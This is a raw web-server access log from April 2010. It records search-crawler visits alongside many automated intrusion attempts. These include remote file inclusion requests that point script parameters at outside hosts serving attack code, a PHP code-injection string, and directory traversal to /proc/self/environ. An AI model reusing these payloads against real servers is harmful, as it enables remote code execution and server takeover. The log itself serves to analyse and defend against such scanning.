88.191.94.188 - - [23/Apr/2010:11:59:53 -0500] "GET /logs//trans/trans.php?trans=&p=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:11:59:53 -0500] "GET /logs/access_log.1270598400%20%20//trans/trans.php?trans=&p=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:11:59:53 -0500] "GET //trans/trans.php?trans=&p=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:12:00:08 -0500] "GET /logs//trans/trans.php?trans=&p=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:12:00:08 -0500] "GET /logs/access_log.1270598400%20%20//trans/trans.php?trans=&p=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:12:00:08 -0500] "GET //trans/trans.php?trans=&p=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.46.13.52 - - [23/Apr/2010:12:00:24 -0500] "GET /logs/access_log.1231113600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.0.234.10 - - [23/Apr/2010:12:00:35 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:12:01:38 -0500] "GET /logs/access_log.1270684800%20%20//trans/trans.php?trans=&p=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:12:01:39 -0500] "GET /logs/access_log.1270684800%20%20//trans/trans.php?trans=&p=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:12:04:10 -0500] "GET /logs/access_log.1212969600%20%20//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:12:04:10 -0500] "GET //?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:12:04:10 -0500] "GET /logs//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
72.46.157.102 - - [23/Apr/2010:12:05:28 -0500] "GET //cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.46.157.102 - - [23/Apr/2010:12:05:28 -0500] "GET /logs/access_log.1263859200//cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.46.157.102 - - [23/Apr/2010:12:05:29 -0500] "GET /logs//cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.129.119.10 - - [23/Apr/2010:12:06:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
174.132.26.98 - - [23/Apr/2010:12:06:13 -0500] "GET //?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:06:13 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:06:13 -0500] "GET /logs//?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:06:34 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:07:58 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:07:58 -0500] "GET /logs//?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:07:58 -0500] "GET //?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:07:59 -0500] "GET /logs/access_log.1268956800//bbs//skin/ggambo7002_board/write.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:07:59 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:07:59 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:09:12 -0500] "GET //?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:09:12 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:09:12 -0500] "GET /logs//?path%5Bdocroot%5D=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
202.131.93.10 - - [23/Apr/2010:12:12:08 -0500] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
202.131.93.10 - - [23/Apr/2010:12:12:08 -0500] "GET /logs/access_log.1233532800//vbgsitemap/vbgsitemap-config.php?base=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
202.131.93.10 - - [23/Apr/2010:12:12:08 -0500] "GET //vbgsitemap/vbgsitemap-config.php?base=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:12:14 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:12:14 -0500] "GET /logs/access_log.1268956800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:12:14 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:12:12:17 -0500] "GET /logs/access_log.1270684800%20%20/delete_all.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:12:12:17 -0500] "GET /logs/delete_all.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:12:12:19 -0500] "GET /delete_all.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.249.71.225 - - [23/Apr/2010:12:12:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [23/Apr/2010:12:12:23 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.114.135.218 - - [23/Apr/2010:12:12:30 -0500] "GET /logs/access_log.1212969600//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:12:12:43 -0500] "GET /logs/access_log.1270684800%20%20/delete_all.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:12:12:43 -0500] "GET /delete_all.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.255.32.182 - - [23/Apr/2010:12:12:43 -0500] "GET /logs/delete_all.php?board_skin_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:12:12:50 -0500] "GET /logs//trans/trans.php?trans=eng&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:12:12:50 -0500] "GET //trans/trans.php?trans=eng&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:12:12:50 -0500] "GET //trans/trans.php?trans=eng&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:12:12:50 -0500] "GET /logs/access_log.1270684800%20%20//trans/trans.php?trans=eng&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:12:12:50 -0500] "GET /logs/access_log.1270684800%20%20//trans/trans.php?trans=eng&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:12:12:50 -0500] "GET /logs//trans/trans.php?trans=eng&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:12:13:55 -0500] "GET /logs/access_log.1270598400%20%20//trans/trans.php?trans=eng&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:12:14:04 -0500] "GET /logs/access_log.1270598400%20%20//trans/trans.php?trans=eng&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.52.150.147 - - [23/Apr/2010:12:14:19 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.52.150.147 - - [23/Apr/2010:12:14:19 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.52.150.147 - - [23/Apr/2010:12:14:19 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.52.150.147 - - [23/Apr/2010:12:14:29 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
85.114.135.218 - - [23/Apr/2010:12:15:18 -0500] "GET /logs/access_log.1219708800//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.195.112.180 - - [23/Apr/2010:12:16:42 -0500] "GET /logs/access_log.1169251200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.98 - - [23/Apr/2010:12:16:55 -0500] "GET /logs/access_log.1261440000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.131.93.10 - - [23/Apr/2010:12:17:05 -0500] "GET /logs/access_log.1262563200//vbgsitemap/vbgsitemap-config.php?base=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:17:14 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:17:14 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:17:14 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:04 -0500] "GET /logs/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:04 -0500] "GET /logs/access_log.1219708800/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:04 -0500] "GET /phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:05 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:05 -0500] "GET /logs/access_log.1215648000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:05 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:09 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:37 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:37 -0500] "GET /phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:37 -0500] "GET /logs/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:18:40 -0500] "GET /logs/access_log.1220054400/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:20:51 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:20:51 -0500] "GET /logs/access_log.1212969600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:20:51 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:20:56 -0500] "GET /logs/access_log.1220054400%20%20/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.199.182 - - [23/Apr/2010:12:22:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.80.193.39 - - [23/Apr/2010:12:23:29 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={8E200D81-FA4F-4B5F-A22F-47907942F58D}; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
75.126.28.140 - - [23/Apr/2010:12:23:34 -0500] "GET /logs/access_log.1266364800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:12:23:34 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:12:23:34 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:12:23:34 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:12:29:27 -0500] "GET /logs/access_log.1268956800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
202.72.242.242 - - [23/Apr/2010:12:36:10 -0500] "GET ////skin/ggambo7002_board/write.php?dir=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
202.72.242.242 - - [23/Apr/2010:12:36:10 -0500] "GET /logs/access_log.1268956800%20%20////skin/ggambo7002_board/write.php?dir=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
202.72.242.242 - - [23/Apr/2010:12:36:10 -0500] "GET /logs////skin/ggambo7002_board/write.php?dir=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.46.157.102 - - [23/Apr/2010:12:37:12 -0500] "GET /logs//cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.46.157.102 - - [23/Apr/2010:12:37:12 -0500] "GET //cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.46.157.102 - - [23/Apr/2010:12:37:12 -0500] "GET /logs/access_log.1263859200//cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 404 329 "-""Mozilla/5.0"
76.73.76.166 - - [23/Apr/2010:12:38:08 -0500] "GET /logs//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:12:38:08 -0500] "GET //index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:12:38:08 -0500] "GET /logs/access_log.1264982400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:12:38:08 -0500] "GET /logs/access_log.1247270400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:12:39:00 -0500] "GET /logs/access_log.1265587200//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.186.30.11 - - [23/Apr/2010:12:39:05 -0500] "GET //index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.186.30.11 - - [23/Apr/2010:12:39:05 -0500] "GET /logs/access_log.1265587200//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
91.186.30.11 - - [23/Apr/2010:12:39:05 -0500] "GET /logs//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
62.149.204.115 - - [23/Apr/2010:12:39:07 -0500] "GET /logs//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.149.204.115 - - [23/Apr/2010:12:39:07 -0500] "GET //index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.149.204.115 - - [23/Apr/2010:12:39:07 -0500] "GET /logs/access_log.1264982400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.149.204.115 - - [23/Apr/2010:12:39:13 -0500] "GET /logs/access_log.1247270400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
122.201.73.182 - - [23/Apr/2010:12:39:20 -0500] "GET /logs/access_log.1264982400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
122.201.73.182 - - [23/Apr/2010:12:39:20 -0500] "GET //index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
122.201.73.182 - - [23/Apr/2010:12:39:20 -0500] "GET /logs//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
91.186.30.11 - - [23/Apr/2010:12:39:22 -0500] "GET /logs/access_log.1264982400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
91.186.30.11 - - [23/Apr/2010:12:39:22 -0500] "GET /logs/access_log.1247270400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
122.201.73.182 - - [23/Apr/2010:12:39:35 -0500] "GET /logs/access_log.1265673600//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
62.149.204.115 - - [23/Apr/2010:12:39:47 -0500] "GET /logs/access_log.1265587200//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
122.201.73.182 - - [23/Apr/2010:12:40:02 -0500] "GET /logs/access_log.1265587200//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
122.201.73.182 - - [23/Apr/2010:12:40:10 -0500] "GET /logs/access_log.1247270400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
211.220.193.170 - - [23/Apr/2010:12:40:51 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.220.193.170 - - [23/Apr/2010:12:40:51 -0500] "GET /logs/e107/e107_handlers/secure_img_render.php?p=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.220.193.170 - - [23/Apr/2010:12:40:51 -0500] "GET /logs/access_log.1271030400%20%20/e107/e107_handlers/secure_img_render.php?p=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 353 "-""Mozilla/5.0"
88.148.8.7 - - [23/Apr/2010:12:42:44 -0500] "GET //index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
88.148.8.7 - - [23/Apr/2010:12:42:44 -0500] "GET /logs//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
88.148.8.7 - - [23/Apr/2010:12:42:44 -0500] "GET /logs/access_log.1264982400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
88.148.8.7 - - [23/Apr/2010:12:46:01 -0500] "GET /logs/access_log.1247270400//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
88.148.8.7 - - [23/Apr/2010:12:46:19 -0500] "GET /logs/access_log.1265587200//index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
209.216.43.133 - - [23/Apr/2010:12:48:00 -0500] "GET /includes/useragent.inc.php?prefix=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
